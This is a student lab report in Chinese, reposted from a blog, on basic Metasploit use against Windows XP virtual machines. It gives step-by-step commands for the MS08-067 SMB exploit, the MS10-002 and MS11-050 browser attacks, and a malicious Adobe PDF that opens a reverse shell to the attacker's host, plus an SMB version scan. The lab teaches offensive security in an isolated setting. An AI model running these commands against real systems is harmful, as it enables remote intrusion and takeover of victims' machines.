Exp5 CAL_MSF基础运用 20154328 常城
CAL_MSF基础运用
1 实验内容
- 一个主动攻击,如ms08_067
- 一个针对浏览器的攻击,如ms11_050
- 一个针对客户端的攻击,如Adobe
成功应用任何一个辅助模块
2 实验过程记录
主动攻击MS08-067大漏洞
关于MS08-067
MS08-067 漏洞是通过MSRPC over SMB 通道调用Server服务程序中的NetPathCanonicalize函数时触发的,而NetPathCanonicalize函数在远程访问其他主机时,会调用NetPathCanonicalize函数对远程访问的路径进行规范化,而在NetPathCanonicalize函数中发生了栈缓冲区内存错误,造成可被利用实施远程远程代码执行。
关于攻击机和靶机
攻击机:kali
靶机:windows xp sp3kali_ip:192.168.192.132winxp_sp3_ip:192.168.192.135
攻击过程
- 在kali终端中开启msfconsole。
输入命令search ms08_067,会显示出找到的渗透模块,如下图所示:
输入命令use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用。然后输入命令show payloads会显示出有效的攻击载荷,如下图所示。
命令show targets会显示出可以被攻击的靶机的操作系统型号,如下图所示:
- 然后set target 0,自动匹配。
- 使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。
- 使用show options显示需要设置的数据。
设置数据:
set LHOST 192.168.192.132set RHOST 192.168.192.134
使用命令show options再次查看payload状态。
输入命令exploit开始攻击,如下图:
- 在kali上输入ipconfig/all,如下图所示:
- 再dir一下下看看:
- 在Windows XP上使用ipconfig/all结果是什么呢~当然是一样的:
### 2. IE浏览器渗透攻击——MS11050安全漏洞
实验准备
- 两台虚拟机,其中一台为kali,一台为Windows XP SP3。
设置虚拟机网络为NAT模式,保证两台虚拟机可以相互间ping通,关闭靶机防火墙。
实验步骤:
- 在kali终端中开启msfconsole。
- 输入命令use windows/browser/ms11_050_mshtml_cobjectelement,进入该漏洞模块。
输入info查看信息:
对应的targets:
- 设置对应的载荷set payload windows/meterpreter/reverse_tcp;
show options
查看需要设置的相关信息:
设置相关信息
set LHOST 10.43.63.133set LPORT 4328set URIPATH baidu
- 在靶机IE上输入网址,
- 连接失败
- 尝试使用ms10_002台风漏洞对IE进行攻击。
-ms10_002台风漏洞黑客挂马利用的最热门漏洞。
use windows/browser/ms10_002_aurora
调用该模块
- set payload windows/meterpreter/reverse_http设置http反向回连
- 设置攻击机IP、以及攻击端口
set URIPATH 4328cc 设置为统一资源标识符路径
开始监听
成功生成一个URL http://192.168.88.132:8080/4328cc
在win xp中的IE浏览器进行访问,显示空白。注意需要关闭其防火墙和杀毒软件。
使用sessions指令查看当前存在的会话,可以看到存在一个ID为1的会话:
用sessions -i 1选择会话1,成功获取了靶机的shell,利用dir指令查看主文件夹里的内容:
3. Adobe阅读器渗透攻击
实验准备:
- 两台虚拟机,其中一台为kali,一台为Windows XP SP3。
- 设置虚拟机网络为NAT模式,保证两台虚拟机可以ping通。
kali下打开显示隐藏文件。
实验步骤:
- 在kali的Terminal中键入msfconsole进入MSF
输入下面这两条命令(加黑部分):
use windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > info
- msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回连
- msf exploit(adobe_cooltype_singi) > set LHOST 192.168.192.132 //攻击机ip
- msf exploit(adobe_cooltype_sing) > set LPORT 4328 //攻击端口固定
- msf exploit(adobe_cooltype_sing) > set FILENAME 20154328.pdf //设置生成的假PDF文件名字
- msf exploit(adobe_cooltype_sing) > exploit
- 把生成的pdf传到靶机上
- kali上输入back退出当前模块
- 进入监听模块
- msf > use exploit/multi/handler //进入监听模块
- msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
- msf exploit(handler) > set LHOST 192.168.192.132 //攻击机ip
- msf exploit(handler) > set LPORT 4328 //攻击端口固定
- msf exploit(handler) > exploit
- 攻击成功
辅助模块应用
关于辅助模块
先看一下有哪些辅助模块
使用show auxiliary
查看可以运用的辅助模块、
选择
scanner/smb/smb_version
用来对靶机的
smb
版本进行扫描设置靶机的IP地址(也可以设置要扫描的一段范围),以及扫描使用的线程:
- 使用exploit指令开始扫描,成功扫描到靶机的smb版本:
3. 基础问题
- 问题:如用自己的话解释什么是exploit,payload,encode?
exploit就相当于是载具或者通道,将木马等病毒传输到靶机上
- payload就是一种包装。将病毒包装成一个可以执行的文件,或者包装成一个指定类型的文件。
encode也就是编码,对payload进行装扮。
实验体会
- 通过这次实验我们可以看到漏洞的危害有多么严重。我们应该及时安装新的补丁,通过安装补丁将自己的电脑的损失降低到最小。
- 这次实验操作并不是很难,但是在选择旧的版本的系统和软件就很难。很多时候找到了软件之后,相对应的漏洞已经无法使用。这次实验让我们看到我们现在所学的只是一些皮毛,距离实战有着很大的差距。我们在以后的学习中应该尝试着通过平时所学到东西来发现现在在正在使用的软件和系统中所存在的漏洞。达到实战的目的。
转载于:https://www.cnblogs.com/20154328changcheng/p/8877598.html
Exp5 CAL_MSF基础运用 20154328 常城相关推荐
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...
- 20155227《网络对抗》Exp5 MSF基础应用
20155227<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. ...
- 20155210 Exp5 MSF基础应用
Exp5 MSF基础应用 一个主动攻击实践,MS08-067 首先利用msfconsole启用msf终端 然后利用search MS08-067搜索漏洞,会显示相应漏洞模块 如图: 根据上图,我们输入 ...
- 20155216 Exp5 MSF基础应用
Exp5 MSF基础应用 基础问题回答 1.用自己的话解释什么是exploit,payload,encode? exploit : Exploit的英文意思就是利用,在做攻击时,通常称为漏洞利用. 一 ...
- 2018-2019-2 20165212《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165212<网络攻防技术>Exp5 MSF基础应用 攻击成果 主动攻击的实践 ms17010eternalblue payload windows/x64/m ...
- JS 基础知识点及常考面试题(一)
JS 基础知识点及常考面试题(一) 原始(Primitive)类型 涉及面试题:原始类型有哪几种?null 是对象嘛? 在 JS 中,存在着 6 种原始值,分别是: boolean null unde ...
- JS 基础知识点及常考面试题(二)
JS 基础知识点及常考面试题(二) 涉及面试题:== 和 === 有什么区别? 对于 == 来说,如果对比双方的类型不一样的话,就会进行类型转换,这也就用到了我们上一章节讲的内容. 假如我们需要对比 ...
- 2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用
目录 Exp5 MSF基础应用 一.基础问题回答 二.攻击系统 ms08_067攻击(成功) 三.攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻 ...
- 《网络对抗》Exp5 MSF基础应用
20155336<网络对抗>Exp5 MSF基础应用 一.基础知识回答 用自己的话解释什么是exploit,payload,encode exploit:渗透攻击的模块合集,将真正要负责攻 ...
- 20155220 Exp5 MSF基础应用
Exp5 MSF基础应用 一个主动攻击实践,MS08-067 首先利用msfconsole启用msf终端 然后利用search MS08-067搜索漏洞,会显示相应漏洞模块 根据上图,我们输入use ...
最新文章
- C++中.lib静态库、.dll动态库的生成及调用1
- C语言中fun的功能是将字符串,下列给定的程序中,fun()函数的功能是:将p所指字符串中......
- mysql 回滚失败_浅析Mysql 数据回滚错误的解决方法
- QCon全球软件开发大会:推动创新,实现技术落地
- JavaSE基础 ——流程控制语句
- linux计划任务失败如何排查原因
- maya要学python吗_Maya入门为什么会这么难?
- ruby trainning - decryption
- “裁员潮”来临,你的工作还稳定吗?
- 联想开机启动项按哪个_联想笔记本按什么键进bios_联想笔记本开机进入bios按哪个键...
- Skywalking+Nacos实现高可用集群和动态配置
- Coding and Paper Letter(七十六)
- 小敏利用计算机设计了一个计算程序,七年级上期中练习卷2013-2014第一学期定稿(10页)-原创力文档...
- Gym 103117 Problem - Spicy Restaurant
- 利用WordPress官方插件创建sitemap站点地图的最佳方法
- HUAWEI被google禁完整版Android的背后——中美两国的博弈。
- 华为HG8245光纤终端及开路由
- 获取股票历史数据和当前数据的API
- 社区老年人服务系统设计与实现(安卓APP+SSH后台+MYSQL)
- 解决微信或系统字体放大缩小,html布局错乱混乱的问题
热门文章
- 深度评论 | 雷军这么努力,为什么小米还是干不过OV
- lua 的斗地主逻辑算法
- 青海干部网络学院 自动学习网站
- python编写程序、一个富翁与陌生人做交易_智慧职教云课堂Python程序设计(常州工业职业技术学院)题目答案...
- ArcGIS表转EXCEL超出上限转换失败
- 包过滤型防火墙iptables
- excel查标准正态分布_利用Excel的NORMSDIST计算正态分布函数表1
- php里macd预测算法,股票MACD指标算法公式
- 如何提高阿里云商标注册的成功率?(经验分享)
- python摄氏温度换算_python华氏温度转为摄氏温度